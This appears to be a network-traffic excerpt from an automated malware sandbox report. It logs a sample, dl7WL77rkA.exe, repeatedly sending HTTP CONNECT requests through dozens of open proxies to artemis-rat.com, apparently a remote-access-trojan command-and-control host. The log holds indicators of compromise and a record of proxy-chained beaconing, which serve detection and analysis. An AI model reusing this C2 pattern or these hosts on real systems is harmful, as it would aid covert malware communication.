                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1418192.168.2.552330103.213.219.20031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.180169106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.201982975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.202159882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.287904024 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1419192.168.2.552347193.136.97.17803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.188929081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.202013969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.202172041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.217653036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1420192.168.2.55381945.233.2.141533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.190351963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1421192.168.2.55381874.118.80.24431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.190565109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1422192.168.2.553825104.27.66.31803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.190743923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.344831944 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1423192.168.2.55347034.176.113.14831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.197274923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:35.651700974 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:36.443967104 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:37.308018923 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:39.036020041 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:42.555923939 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:49.468103886 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:03.294523954 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:31.455944061 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1424192.168.2.55382047.74.226.850013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.198609114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1425192.168.2.553566117.160.250.16380813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.234368086 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.190834999 CET | 221 | IN | HTTP/1.1 403 Access Denied
Date: Mon, 11 Mar 2024 02:30:45 GMT
Connection: close
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 43
Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
Data Ascii: You are not allowed to access the document.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1426192.168.2.553823198.37.57.112803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.253667116 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.484904051 CET | 503 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 11 Mar 2024 02:30:44 GMT
Connection: close
Content-Length: 324
Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1427192.168.2.552484198.57.211.235110963876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.340641975 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.405164003 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.405400038 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1428192.168.2.553467103.180.123.14180803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.349536896 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.992332935 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1429192.168.2.553446154.65.39.7803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.349705935 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.423821926 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.468288898 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.509557009 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1430192.168.2.553821103.216.49.15180803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.352854967 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1431192.168.2.553678184.170.249.6541453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.352930069 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1432192.168.2.552987162.253.68.9741453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.360085011 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1433192.168.2.553838200.10.73.21056783876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.368350029 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1434192.168.2.55388731.43.179.160803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:44.373224974 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.529608011 CET  316  IN  HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1435192.168.2.549802147.124.212.31110703876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:44.374489069 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.423784971 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.468287945 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.509571075 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1436192.168.2.553892172.67.162.127803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:44.376179934 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.532151937 CET  316  IN  HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1437192.168.2.553831185.217.143.23803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:44.383852959 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.721004009 CET  327  IN  HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1438192.168.2.553911104.25.87.42803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:44.388421059 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.544698000 CET  316  IN  HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1439192.168.2.55250383.136.219.140803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:44.389086008 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.423821926 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.804291964 CET  536  IN  HTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:50 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.804368973 CET269IN
                                                                                                                                                                                                                                                            Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1440192.168.2.55354672.49.49.11310343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.392520905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1441192.168.2.55385337.44.238.2534713876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.398004055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.092643023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.999547958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905389071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.592633963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.202121973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.905085087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
